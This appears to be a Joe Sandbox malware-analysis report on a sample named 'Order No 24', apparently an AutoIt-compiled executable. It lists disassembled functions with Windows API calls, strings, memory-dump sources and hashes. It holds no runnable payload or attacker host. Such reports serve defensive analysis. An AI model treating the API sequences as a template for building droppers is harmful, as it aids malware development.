                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 009D7A4A
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 009D7A55
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 009D7A60
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 009D7A6B
                                                                                                                                  • GetCursorInfo.USER32(?), ref: 009D7A7B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$Load$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2577412497-0
                                                                                                                                  • Opcode ID: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                                                                                                                  • Instruction ID: 4889320b8dae02412392c64887128148b6a97664290678dc9a5f216c074e3d4a
                                                                                                                                  • Opcode Fuzzy Hash: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                                                                                                                  • Instruction Fuzzy Hash: BC31E1B1D4831A6ADB109FF68C8995FFEECFB04750F50452BA50DA7280EA78A5018FA1
                                                                                                                                  Function 0098C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0098C8B7,?,00002000,?,?,00000000,?,0098419E,?,?,?,00A1DC00), ref: 0099E984
                                                                                                                                    • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                                                                                                                  • __wsplitpath.LIBCMT ref: 0098C93E
                                                                                                                                    • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                                                                                                                  • _wcscpy.LIBCMT ref: 0098C953
                                                                                                                                  • _wcscat.LIBCMT ref: 0098C968
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0098CABE
                                                                                                                                    • Part of subcall function 0098B337: _wcscpy.LIBCMT ref: 0098B36F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                  • API String ID: 2258743419-1018226102
                                                                                                                                  • Opcode ID: aeb60a37b4bb970c8080bcd743433000186fea148d0f5ea050c26b0ae64b1526
                                                                                                                                  • Instruction ID: f8ce61fd829ff1015653d856b32fa9d4fe141fc0acbcfe0576f5f9265350bcd0
                                                                                                                                  • Opcode Fuzzy Hash: aeb60a37b4bb970c8080bcd743433000186fea148d0f5ea050c26b0ae64b1526
                                                                                                                                  • Instruction Fuzzy Hash: 99129C715083459FC724EF24C881AAFBBE8BFD9314F44491EF589932A1DB34DA49CB62
                                                                                                                                  Function 009ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009ECEFB
                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 009ECF73
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009ECFF4
                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009ED016
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED025
                                                                                                                                  • DestroyWindow.USER32(?), ref: 009ED042
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 009ED075
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED094
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009ED0A9
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009ED0B0
                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009ED0C2
                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009ED0DA
                                                                                                                                    • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                  • API String ID: 3877571568-3619404913
                                                                                                                                  • Opcode ID: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                                                                                                                  • Instruction ID: 1df9e29ff17ce9fa30023324b652653118b1b0c5984b2613c54eee68d855cc4c
                                                                                                                                  • Opcode Fuzzy Hash: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                                                                                                                  • Instruction Fuzzy Hash: 1171CAB9140345AFDB21CF68CC84F6A7BE9EB89704F08491DF985872A1D735EC42CB22
                                                                                                                                  Function 009EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 009EF37A
                                                                                                                                    • Part of subcall function 009ED7DE: ClientToScreen.USER32(?,?), ref: 009ED807
                                                                                                                                    • Part of subcall function 009ED7DE: GetWindowRect.USER32(?,?), ref: 009ED87D
                                                                                                                                    • Part of subcall function 009ED7DE: PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF3E3
                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009EF3EE
                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009EF411
                                                                                                                                  • _wcscat.LIBCMT ref: 009EF441
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009EF458
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF471
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF488
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF4AA
                                                                                                                                  • DragFinish.SHELL32(?), ref: 009EF4B1
                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009EF59C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                  • API String ID: 169749273-3440237614
                                                                                                                                  • Opcode ID: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                                                                                                                  • Instruction ID: d17761d23241e0135fed87600a8023349eabfecc764f219292ec638999ae86fd
                                                                                                                                  • Opcode Fuzzy Hash: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                                                                                                                  • Instruction Fuzzy Hash: D5613A72108344AFC701EFA4CC85E9BBBE8BFC9710F000A1EB595921A1DB71DA4ACB52
                                                                                                                                  Function 009CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 009CAB3D
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 009CAB46
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009CAB52
                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009CAC40
                                                                                                                                  • __swprintf.LIBCMT ref: 009CAC70
                                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 009CAC9C
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009CAD4D
                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 009CADDF
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009CAE35
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009CAE44
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 009CAE80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                  • Opcode ID: 7a5f8f036ca1a3cc58218231d2d70c2e1bb494fbdd5af21bfcc8df23a61da248
                                                                                                                                  • Instruction ID: 835a573ac40c31f0bc51480bc85f8d7f184f42ef28f54cad9dfddb07a783391e
                                                                                                                                  • Opcode Fuzzy Hash: 7a5f8f036ca1a3cc58218231d2d70c2e1bb494fbdd5af21bfcc8df23a61da248
                                                                                                                                  • Instruction Fuzzy Hash: 29D1EF71E00219EFCB249FA5D884F6AB7B9BF44704F14885DE4069B291DB78EC40DBA3
                                                                                                                                  Function 009E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009E71FC
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009E7247
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                  • Opcode ID: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                                                                                                                  • Instruction ID: d5c1a76b3c4409fb5c9e17d974c0a0e4887db12a7551daa6d9170d527d462d05
                                                                                                                                  • Opcode Fuzzy Hash: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                                                                                                                  • Instruction Fuzzy Hash: 79917E702087419BCB05EF65C851B6EB7A5BF94310F04485DF8966B3A3EB34ED0ADB92
                                                                                                                                  Function 009EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009EE5AB
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009EBEAF), ref: 009EE607
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE647
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE68C
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE6C3
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,009EBEAF), ref: 009EE6CF
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EE6DF
                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,009EBEAF), ref: 009EE6EE
                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009EE70B
                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009EE717
                                                                                                                                    • Part of subcall function 009A0FA7: __wcsicmp_l.LIBCMT ref: 009A1030
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                  • API String ID: 1212759294-1154884017
                                                                                                                                  • Opcode ID: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                                                                                                                  • Instruction ID: 7ccc2e305b1d4abdc7b0ee8caf173012c9ee7af1d7d544c6591dd834ed1b2186
                                                                                                                                  • Opcode Fuzzy Hash: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                                                                                                                  • Instruction Fuzzy Hash: 4461F171500259FAEB25DFA5CC86FBE77ACBB08B24F104505F911E61D1EB70AE81CBA0
                                                                                                                                  Function 009CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 009CD292
                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 009CD2DF
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD327
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD35E
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD38C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                  • API String ID: 1148790751-4113822522
                                                                                                                                  • Opcode ID: af33c4f8cff21eeaf8cbaf57cfcde09756d7fa79e5327a4b239c3ca4b8e68e40
                                                                                                                                  • Instruction ID: 32f8dc54ab2ac02ec119172c02775f8f6bcbe1fdcc094b38a5d70d4d30bf756e
                                                                                                                                  • Opcode Fuzzy Hash: af33c4f8cff21eeaf8cbaf57cfcde09756d7fa79e5327a4b239c3ca4b8e68e40
                                                                                                                                  • Instruction Fuzzy Hash: 05510A72508605AFC700EF24C991A6AB7E8FF98758F10486DF89567391DB31EE0ACB52
                                                                                                                                  Function 009C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?), ref: 009C26F1
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C26FA
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?,00000016), ref: 009C271C
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C271F
                                                                                                                                  • __swprintf.LIBCMT ref: 009C276F
                                                                                                                                  • __swprintf.LIBCMT ref: 009C2780
                                                                                                                                  • _wprintf.LIBCMT ref: 009C2829
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C2840
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                  • API String ID: 618562835-2268648507
                                                                                                                                  • Opcode ID: e329c3879c3733123feeb07d254792c97a5607b777908d94f657e507a82ef53e
                                                                                                                                  • Instruction ID: 16aa520db3dcefe28bf3872ca3b5c92f897715d036e9940f66bce36b55dd6f94
                                                                                                                                  • Opcode Fuzzy Hash: e329c3879c3733123feeb07d254792c97a5607b777908d94f657e507a82ef53e
                                                                                                                                  • Instruction Fuzzy Hash: DB414F72800219BBCF14FBE0DD96FEEB778AF95344F100469B50176192EA34AF49CBA1
                                                                                                                                  Function 009CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009CD0D8
                                                                                                                                  • __swprintf.LIBCMT ref: 009CD0FA
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 009CD137
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009CD15C
                                                                                                                                  • _memset.LIBCMT ref: 009CD17B
                                                                                                                                  • _wcsncpy.LIBCMT ref: 009CD1B7
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009CD1EC
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009CD1F7
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 009CD200
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009CD20A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  • Opcode ID: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                                                                                                                  • Instruction ID: 2069bfdc41a8c93e409f24f9c96873be1accec7b848c79921bef206380427fbc
                                                                                                                                  • Opcode Fuzzy Hash: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                                                                                                                  • Instruction Fuzzy Hash: 1131C2B2900109ABDB21DFE4CC49FEB37BCEF89700F1041BAF519D21A1EB7096468B65
                                                                                                                                  Function 009EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009EBEF4,?,?), ref: 009EE754
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE76B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE776
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE783
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009EE78C
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE79B
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009EE7A4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7AB
                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7BC
                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A0D9BC,?), ref: 009EE7D5
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009EE7E5
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 009EE809
                                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 009EE834
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009EE85C
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009EE872
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
